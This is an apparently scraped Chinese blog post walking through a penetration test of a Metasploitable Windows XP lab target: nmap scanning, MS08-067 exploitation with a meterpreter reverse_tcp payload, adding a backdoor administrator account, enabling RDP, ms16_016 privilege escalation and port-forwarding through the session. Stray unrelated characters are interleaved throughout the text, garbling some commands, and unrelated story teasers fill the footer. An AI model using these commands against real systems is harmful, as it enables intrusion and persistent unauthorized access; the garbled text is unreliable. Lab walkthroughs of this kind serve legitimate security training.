Metasploitable的簡單滲透測試

0x00 Metasploitable

Metasploitable漏洞演練系統(tǒng)块请,基于ubuntu躬窜、xp操作系統(tǒng),本身設(shè)計作為安全工具測試和演示常見漏洞攻擊寞肖,他的作用是用來作為MSF攻擊用的靶機(jī),他是一個具有無數(shù)未打補(bǔ)丁漏洞與開放了無數(shù)高危端口的滲透演練系統(tǒng)做修,可以使我們進(jìn)行練習(xí)。
本次測試使用xp系統(tǒng)的靶機(jī)葱峡,下載地址

0x01 查看詳細(xì)信息

nmap -sP -T5 
nmap -P1-65535 -T4 

使用nmap進(jìn)行探測發(fā)現(xiàn)砚哗,使用nmap結(jié)合腳本進(jìn)行掃描測試:

nmap -sT -A --script=smb-check-vulns -P0 192
-sT 使用TCP Connect掃描
-A 是指高級操作系統(tǒng)探測功能,對一個特定服務(wù)進(jìn)行更深的旗標(biāo)和指紋攫取
--script=smb-check-vulns 調(diào)用smb-check-vulns腳本
-P0 進(jìn)行更深層次的掃描族沃,不進(jìn)行主機(jī)發(fā)現(xiàn).168.0.146


發(fā)現(xiàn)探測出MS08-067漏洞频祝,使用Metasploit進(jìn)行攻擊利用泌参。

0x02 Metasploit的利用

2.1 查找 MS08-067相關(guān)的模塊


2.2 使用選中的模塊并查看


set TARGET 5

2.2 設(shè)置攻擊參數(shù)
show options 查看一下參數(shù)脆淹,確保無誤
設(shè)置PAYLOAD(攻擊載荷)
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.146 設(shè)置遠(yuǎn)程主機(jī)IP地址
set LHOST 192.168.1.179 設(shè)置反向連接地址為本機(jī)IP地址
set LPORT 55555 設(shè)置本機(jī)監(jiān)聽的TCP端口號
這個載荷在攻擊成功后,會從目標(biāo)主機(jī)發(fā)起一個反彈連接沽一,連接到LHOST中指定的IP地址盖溺。

2.3 開始攻擊,發(fā)現(xiàn)已經(jīng)上鉤铣缠;

0x03 提權(quán)

3.1 查看權(quán)限烘嘱,判斷是否需要進(jìn)行提權(quán)

getuid

3.2 增加用戶名并設(shè)置為管理員

net user zjw 123 /add
net localgroup administrators zjw /add



3.3 開啟3389端口遠(yuǎn)程登錄

run getgui -e (僅僅是打開遠(yuǎn)程管理)
run getgui -u hacker -p s3cr3t(打開遠(yuǎn)程管理并且創(chuàng)造一個新的用戶名為Hacker密碼為s3cr3t的帳號)



3.4 遠(yuǎn)程連接目標(biāo)主機(jī)
rdesktop -f -a 16 192.168.0.146:3389
成功登陸目標(biāo)主機(jī)

0x04 補(bǔ)充知識

4.1 拿到shell只是普通用戶怎么辦昆禽?
上面演示的直接就是最高權(quán)限,當(dāng)然這種情況在平時滲透測試中也是比較少見的蝇庭,那么我們就得進(jìn)行提權(quán)了醉鳖。

meterpreter > background
msf exploit(handler) > search ms16
msf exploit(handler) > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > info
msf exploit(ms16_016_webdav) > show options
msf exploit(ms16_016_webdav) > set SESSION 1    # 設(shè)置會剛才我們后門連接的ID號 1
msf exploit(ms16_016_webdav) > exploit
msf exploit(ms16_016_webdav) > sessions
msf exploit(ms16_016_webdav) > sessions -i 1
meterpreter > getuid

這是發(fā)現(xiàn)我們怎么還是普通權(quán)限,我們進(jìn)行查看進(jìn)程哮内。然后加載我們的進(jìn)程號

meterpreter > ps
meterpreter > migrate + 進(jìn)程號

這樣已經(jīng)提升為了system權(quán)限

4.2 有時候我們在公網(wǎng)而目標(biāo)主機(jī)在內(nèi)網(wǎng)如何登陸盗棵?
這時候就要使用端口轉(zhuǎn)發(fā)來實現(xiàn)了,將目標(biāo)主機(jī)的端口轉(zhuǎn)發(fā)到我們本機(jī)北发。

portfwd add -l 你本機(jī)的監(jiān)聽端口 -r 127.0.0.1 -p 3389

執(zhí)行之后所有端口3389的內(nèi)網(wǎng)流量都會通過這個meterpreter的會話來轉(zhuǎn)發(fā)到你kali的127.0.0.1的指定端口上 纹因。
假如在這里我設(shè)置的監(jiān)聽端口為2222,那么我執(zhí)行的就是

portfwd add -l 2222 -r 127.0.0.1 -p 3389

然后開始連接遠(yuǎn)程桌面琳拨。新建一個終端窗口瞭恰,執(zhí)行連接Windows遠(yuǎn)程桌面的命令就OK了。

rdesktop 127.1.1.0:2222
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末狱庇,一起剝皮案震驚了整個濱河市惊畏,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌密任,老刑警劉巖陕截,帶你破解...
    沈念sama閱讀 206,311評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異批什,居然都是意外死亡农曲,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,339評論 2 382
  • 文/潘曉璐 我一進(jìn)店門驻债,熙熙樓的掌柜王于貴愁眉苦臉地迎上來乳规,“玉大人,你說我怎么就攤上這事合呐∧旱模” “怎么了?”我有些...
    開封第一講書人閱讀 152,671評論 0 342
  • 文/不壞的土叔 我叫張陵淌实,是天一觀的道長冻辩。 經(jīng)常有香客問我,道長拆祈,這世上最難降的妖魔是什么恨闪? 我笑而不...
    開封第一講書人閱讀 55,252評論 1 279
  • 正文 為了忘掉前任,我火速辦了婚禮放坏,結(jié)果婚禮上咙咽,老公的妹妹穿的比我還像新娘。我一直安慰自己淤年,他們只是感情好钧敞,可當(dāng)我...
    茶點故事閱讀 64,253評論 5 371
  • 文/花漫 我一把揭開白布蜡豹。 她就那樣靜靜地躺著,像睡著了一般溉苛。 火紅的嫁衣襯著肌膚如雪镜廉。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,031評論 1 285
  • 那天愚战,我揣著相機(jī)與錄音桨吊,去河邊找鬼。 笑死凤巨,一個胖子當(dāng)著我的面吹牛视乐,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播敢茁,決...
    沈念sama閱讀 38,340評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼佑淀,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了彰檬?” 一聲冷哼從身側(cè)響起伸刃,我...
    開封第一講書人閱讀 36,973評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎逢倍,沒想到半個月后捧颅,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,466評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡较雕,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,937評論 2 323
  • 正文 我和宋清朗相戀三年碉哑,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片亮蒋。...
    茶點故事閱讀 38,039評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡扣典,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出慎玖,到底是詐尸還是另有隱情贮尖,我是刑警寧澤,帶...
    沈念sama閱讀 33,701評論 4 323
  • 正文 年R本政府宣布趁怔,位于F島的核電站湿硝,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏润努。R本人自食惡果不足惜关斜,卻給世界環(huán)境...
    茶點故事閱讀 39,254評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望任连。 院中可真熱鬧蚤吹,春花似錦例诀、人聲如沸随抠。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,259評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽拱她。三九已至二驰,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間秉沼,已是汗流浹背桶雀。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留唬复,地道東北人矗积。 一個月前我還...
    沈念sama閱讀 45,497評論 2 354
  • 正文 我出身青樓,卻偏偏與公主長得像敞咧,于是被迫代替她去往敵國和親棘捣。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,786評論 2 345

推薦閱讀更多精彩內(nèi)容

  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,134評論 0 11
  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫.即命令提示符(CMD)休建,是在OS / 2 乍恐, Windows...
    青冥之上閱讀 2,387評論 0 24
  • 炎夏已至,除了在時尚秀中大熱的高跟涼鞋测砂,你還有一個不錯的選擇—高跟運(yùn)動鞋茵烈。多年來,高跟運(yùn)動鞋滿足了很多姑娘的愿望砌些,...
    qzuser_c168閱讀 342評論 0 0
  • 任何項目的報價都隱含著報價者的經(jīng)驗呜投。受小圓桌開發(fā)小組的委托,在此分享外包報價的一些考慮因素存璃,希望能對接單經(jīng)驗不足的...
    小圓桌閱讀 14,746評論 1 18
  • 想寫一首詩 想寫寫最近的天氣 晴朗了宙彪,又下雨了 一場又一場的 想寫寫心情 邊喝水邊看窗外天空飄過的云 平靜地思考 ...
    wu楓閱讀 141評論 0 1